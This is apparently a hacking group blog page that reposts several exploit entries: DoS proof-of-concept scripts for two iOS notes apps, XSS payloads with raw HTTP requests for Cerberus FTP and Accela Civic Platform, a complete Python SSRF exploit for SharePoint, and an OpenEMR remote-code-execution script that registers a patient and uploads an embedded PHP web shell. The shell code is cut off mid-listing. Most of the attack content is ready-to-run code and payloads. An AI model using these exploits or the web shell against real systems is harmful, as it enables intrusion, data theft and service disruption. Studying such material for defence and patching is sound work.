# Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
# Date: 06-07-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608
# Version: 3.0.6
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863130288
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
# Date: 08/06/2021
# Exploit Author: Mohammad Hossein Kaviyany
# Vendor Homepage: www.cerberusftp.com
# Software Link: https://www.cerberusftp.com/download/
# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier
# Tested on: windows server 2016
# CVE: CVE-2019-25046
------------
About Cerberus FTP Server (From Vendor Site) :
Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS,
FIPS 140-2 validated, and Active Directory and LDAP authentication.
--------------------------------------------------------
Exploit Detailes :
This stored XSS bug happens when a user uploads an svg file with the following content :
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
Exploit POC :
# Vulnerable Path : /file/upload
# Parameter: files (POST)
# Vector: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
#Payload:
POST /file/upload HTTP/1.1
Host: target.com
Connection: close
Content-Length: 484
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG
Origin: https://target.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://target.com/file/d/home/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM
------WebKitFormBoundaryAAM6ZtOAsyklo6JG
Content-Disposition: form-data; name="cd"
/home
------WebKitFormBoundaryAAM6ZtOAsyklo6JG
Content-Disposition: form-data; name="csrftoken"
z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg
------WebKitFormBoundaryAAM6ZtOAsyklo6JG
Content-Disposition: form-data; name="files[]"; filename="file.svg"
Content-Type: image/svg+xml
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
------WebKitFormBoundaryAAM6ZtOAsyklo6JG--
--------------------------
# Exploit Title: Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
# Exploit Author: Abdulazeez Alaseeri
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Tested on: JBoss server/windows
# Type: Web App
# Date: 06/07/2021
# CVE: CVE-2021-33904
================================================================
Accela Civic Platform Cross-Site-Scripting <= 21.1
================================================================
================================================================
Request Heeaders start
================================================================
GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1
Host: Hidden for security reasons
Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Heeaders end
================================================================
================================================================
Response Heeaders start
================================================================
HTTP/1.1 200 OK
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure
Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure
Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure
X-XSS-Protection: 0
Pragma: No-cache
Date: Sun, 06 Jun 2021 18:34:38 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13222
================================================================
Response Heeaders end
================================================================
You can notice that the parameter "servProvCode" is vulnerable to XSS.
Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9
# Exploit Title: n+otes 1.6.2 - Denial of Service (PoC)
# Date: 06-09-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/n-otes/id596895960
# Version: 1.6.2
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
# Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)
# Date: 09 Jun 2021
# Exploit Author: Alex Birnberg
# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=57462
# Version: 16.0.10372.20060
# Tested on: Windows Server 2019
# CVE : CVE-2021-31950
#!/usr/bin/env python3
import html
import random
import string
import xml.sax.saxutils
import textwrap
import requests
import argparse
import xml.etree.ElementTree as ET
from requests_ntlm2 import HttpNtlmAuth
from urllib.parse import urlencode, urlparse
class Exploit:
def __init__(self, args):
o = urlparse(args.url)
self.url = args.url
self.service = o.path
self.username = args.username
self.password = args.password
self.target = args.target
self.headers = args.header
self.method = args.request
self.data = args.data
self.content_type = args.content_type
self.s = requests.Session()
self.s.auth = HttpNtlmAuth(self.username, self.password)
self.s.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'
}
self.s.proxies = {
'http': 'http://127.0.0.1:8080'
}
def trigger(self):
headers = ''
if self.headers:
for header in self.headers:
header = list(map(lambda x: x.strip(), header.split(':')))
if len(header) != 2:
continue
headers += '<dataurl:Header name="{}">{}</dataurl:Header>'.format(header[0], header[1])
method = ''
bypass_local = ''
if self.method and self.method.upper() == 'POST':
method = 'HTTP Post'
else:
method = 'HTTP Get'
bypass_local = '<dataurl:Arguments><dataurl:Argument Name="{0}">{0}</dataurl:Argument></dataurl:Arguments>'.format(''.join(random.choice(string.ascii_letters) for i in range(16)))
content_type = ''
if self.content_type and len(self.content_type):
content_type = '<dataurl:ContentType>{}</dataurl:ContentType>'.format(self.content_type)
data = ''
if self.data and len(self.data):
data = '<dataurl:PostData Encoding="Decode">{}</dataurl:PostData>'.format(html.escape(self.data).encode('ascii', 'xmlcharrefreplace').decode('utf-8'))
query_xml = textwrap.dedent('''\
<udc:DataSource xmlns:udc="http://schemas.microsoft.com/data/udc" xmlns:udcs="http://schemas.microsoft.com/data/udc/soap" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:dsp="http://schemas.microsoft.com/sharepoint/dsp" xmlns:dataurl="http://schemas.microsoft.com/sharepoint/dsp/xmlurl">
<udc:ConnectionInfo>
<udcs:Location href="">XMLURLDataAdapter</udcs:Location>
<soap:Header>
<dsp:versions>
</dsp:versions>
<dsp:request method="query" />
</soap:Header>
<soap:Body>
<dsp:queryRequest>
<dsp:ptQuery>
<dataurl:Headers>
<dataurl:Url href="{}" Method="{}"/>
{}
{}
{}
{}
</dataurl:Headers>
</dsp:ptQuery>
</dsp:queryRequest>
</soap:Body>
</udc:ConnectionInfo>
</udc:DataSource>'''.format(self.target, method, bypass_local, headers, data, content_type))
query_xml = xml.sax.saxutils.escape(query_xml.replace('\r', '').replace('\n', ''))
data = textwrap.dedent('''\
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetXmlDataFromDataSource xmlns="http://microsoft.com/sharepoint/webpartpages">
<queryXml>{}</queryXml>
</GetXmlDataFromDataSource>
</soap:Body>
</soap:Envelope>'''.format(query_xml))
r = self.soap('webpartpages', 'http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource', data)
root = ET.fromstring(r.content)
try:
namespaces = {
'soap': 'http://schemas.xmlsoap.org/soap/envelope/'
}
value = list(root.find('soap:Body', namespaces).iter())[2]
if value.tag == 'faultcode':
print('Error:', list(root.find('soap:Body', namespaces).iter())[3].text)
else:
print(value.text)
except:
print(r.content)
pass
def soap(self, service, action, data):
headers = {
'SOAPAction': '"{}"'.format(action),
'Host': 'localhost',
'Content-Type': 'text/xml; charset=utf-8',
}
return self.s.post('{}/_vti_bin/{}.asmx'.format(self.url, service), headers=headers, data=data)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--url', help='Base URL', required=True, metavar='<url>')
parser.add_argument('--username', help='Username of team site owner', required=True, metavar='<username>')
parser.add_argument('--password', help='Password of team site owner', required=True, metavar='<password>')
parser.add_argument('--target', help='Target URL to work with', required=True, metavar='<target>')
parser.add_argument('-H', '--header', help='Pass custom header(s) to server', action='append', metavar='<header>')
parser.add_argument('-X', '--request', help='Specify request command to use', metavar='<command>')
parser.add_argument('-d', '--data', help='HTTP POST data', metavar='<data>')
parser.add_argument('-c', '--content-type', help='Value for the "Content-Type" header', metavar='<type>')
exploit = Exploit(parser.parse_args())
exploit.trigger()
# Exploit Title: OpenEMR 5.0.0 - Remote Code Execution (Authenticated)
# Date 10.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/5.0.0/openemr-5.0.0.zip/download
# Version: 5.0.0
# Tested on: Windows 10
# CVE: CVE-2017-9380
# Documentation: https://github.com/Hacker5preme/Exploits#cve-2017-9380-exploit
'''
Description:
The OpenEMR application allows users from all roles to upload files. However, the application does not whitelist only
certain type of files (e.g. PDF, JPG, PNG, DOCX, etc). At the contary, any type of files can be uploaded to the
filesystem via the application. While OpenEMR recommends during the installation to restrict access to the repository
hosting uploaded files, unfortunately, such recommendations are too often ignored by users and can result in full
compromise of the web server and its data.
'''
'''
Import required modules:
'''
import argparse
import requests
import string
import random
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Exploit for CVE-2017-9380')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
openemr_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
'''
Exploit:
'''
# Authentication preparation:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'
auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default'
response = session.get(auth_chek_url)
# Header (auth):
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Referer': auth_chek_url,
'Upgrade-Insecure-Requests': '1',
}
# Body (auth):
body = {
'new_login_session_management': '1',
'authProvider': 'Default',
'authUser': username,
'clearPass': password,
'languageChoice': '1'
}
# Authenticate:
print('')
print('[+] Authentication')
auth = session.post(auth_url,headers=header, data=body)
# Create random patient name:
letters_up = string.ascii_uppercase
letters_down = string.ascii_lowercase
first_name = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(10))
surname = ''.join(random.choice(letters_up)) + ''.join(random.choice(letters_down) for i in range(7))
print('')
print('[+] Creating patient name randomly:')
print(' [*] First Name: ' + first_name)
print(' [*] Surname: ' + surname)
# Registration preparation:
url_reg = 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new_comprehensive_save.php'
# Header (registration):
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Referer': 'http://' + target_ip + ':' + target_port + openemr_path + 'interface/new/new.php',
'Upgrade-Insecure-Requests': '1'
}
body = {
'form_cb_1': '1',
'form_title': 'Mr.',
'form_fname': first_name,
'form_mname': '',
'form_lname': surname,
'form_pubpid': '',
'form_DOB': '2021-05-04',
'form_sex': 'Male',
'form_ss': '',
'form_drivers_license': '',
'form_status': '',
'form_genericname1': '',
'form_genericval1': '',
'form_genericname2': '',
'form_genericval2': '',
'form_billing_note': '',
'form_street': '',
'form_city': '',
'form_state': '',
'form_postal_code': '',
'form_county': '',
'form_country_code': '',
'form_mothersname': '',
'form_contact_relationship': '',
'form_phone_contact': '',
'form_phone_home': '',
'form_phone_biz': '',
'form_phone_cell': '',
'form_email': '',
'form_email_direct': '',
'form_providerID': '',
'form_ref_providerID': '',
'form_pharmacy_id': '0',
'form_hipaa_notice': '',
'form_hipaa_voice': '',
'form_hipaa_message': '',
'form_hipaa_mail': '',
'form_hipaa_allowsms': '',
'form_hipaa_allowemail': '',
'form_allow_imm_reg_use': '',
'form_allow_imm_info_share': '',
'form_allow_health_info_ex': '',
'form_allow_patient_portal': '',
'form_care_team': '',
'form_cmsportal_login': '',
'form_imm_reg_status': '',
'form_imm_reg_stat_effdate': '',
'form_publicity_code': '',
'form_publ_code_eff_date': '',
'form_protect_indicator': '',
'form_prot_indi_effdate': '',
'form_industry': '',
'form_occupation': '',
'form_em_name': '',
'form_em_street': '',
'form_em_city': '',
'form_em_state': '',
'form_em_postal_code': '',
'form_em_country': '',
'form_language': '',
'form_ethnicity': '',
'form_family_size': '',
'form_financial_review': '',
'form_monthly_income': '',
'form_homeless': '',
'form_interpretter': '',
'form_migrantseasonal': '',
'form_referral_source': '',
'form_vfc': '',
'form_religion': '',
'form_deceased_date': '',
'form_deceased_reason': '',
'form_guardiansname': '',
'form_guardianrelationship': '',
'form_guardiansex': '',
'form_guardianaddress': '',
'form_guardiancity': '',
'form_guardianstate': '',
'form_guardianpostalcode': '',
'form_guardiancountry': '',
'form_guardianphone': '',
'form_guardianworkphone': '',
'form_guardianemail': '',
'i1provider': '',
'i1plan_name': '',
'i1effective_date': '',
'i1policy_number': '',
'i1group_number': '',
'i1subscriber_employer': '',
'i1subscriber_employer_street': '',
'i1subscriber_employer_city': '',
'form_i1subscriber_employer_state': '',
'i1subscriber_employer_postal_code': '',
'form_i1subscriber_employer_country': '',
'i1subscriber_fname': '',
'i1subscriber_mname': '',
'i1subscriber_lname': '',
'form_i1subscriber_relationship': '',
'i1subscriber_DOB': '',
'i1subscriber_ss': '',
'form_i1subscriber_sex': '',
'i1subscriber_street': '',
'i1subscriber_city': '',
'form_i1subscriber_state': '',
'i1subscriber_postal_code': '',
'form_i1subscriber_country': '',
'i1subscriber_phone': '',
'i1copay': '',
'i1accept_assignment': 'TRUE',
'i2provider': '',
'i2plan_name': '',
'i2effective_date': '',
'i2policy_number': '',
'i2group_number': '',
'i2subscriber_employer': '',
'i2subscriber_employer_street': '',
'i2subscriber_employer_city': '',
'form_i2subscriber_employer_state': '',
'i2subscriber_employer_postal_code': '',
'form_i2subscriber_employer_country': '',
'i2subscriber_fname': '',
'i2subscriber_mname': '',
'i2subscriber_lname': '',
'form_i2subscriber_relationship': '',
'i2subscriber_DOB': '',
'i2subscriber_ss': '',
'form_i2subscriber_sex': '',
'i2subscriber_street': '',
'i2subscriber_city': '',
'form_i2subscriber_state': '',
'i2subscriber_postal_code': '',
'form_i2subscriber_country': '',
'i2subscriber_phone': '',
'i2copay': '',
'i2accept_assignment': 'TRUE',
'i3provider': '',
'i3plan_name': '',
'i3effective_date': '',
'i3policy_number': '',
'i3group_number': '',
'i3subscriber_employer': '',
'i3subscriber_employer_street': '',
'i3subscriber_employer_city': '',
'form_i3subscriber_employer_state': '',
'i3subscriber_employer_postal_code': '',
'form_i3subscriber_employer_country': '',
'i3subscriber_fname': '',
'i3subscriber_mname': '',
'i3subscriber_lname': '',
'form_i3subscriber_relationship': '',
'i3subscriber_DOB': '',
'i3subscriber_ss': '',
'form_i3subscriber_sex': '',
'i3subscriber_street': '',
'i3subscriber_city': '',
'form_i3subscriber_state': '',
'i3subscriber_postal_code': '',
'form_i3subscriber_country': '',
'i3subscriber_phone': '',
'i3copay': '',
'i3accept_assignment': 'TRUE'}
print('')
print('[+] Registering patient:')
x = session.post(url_reg, headers=header, data=body).text
# Get Patient-ID:
id = x[(x.find('pid=')+4):x.find('&')]
print(' [*] ID-NUMBER: ' + id)
# Construct upload URL:
url_upload = 'http://' + target_ip + ':' + target_port + openemr_path + '/controller.php?document&upload&patient_id=' + id + '&parent_id=1&"'
# Header (upload):
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------370797319835249590062969815666",
"Origin": 'http://' + target_ip,
"Connection": "close",
"Referer": url_upload,
"Upgrade-Insecure-Requests": "1"
}
# Body (shell); I'm using p0wny shell: https://github.com/flozz/p0wny-shell
body = "-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n64000000\r\n-----------------------------370797319835249590062969815666\r\nContent-Disposition: form-data; name=\"file[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return 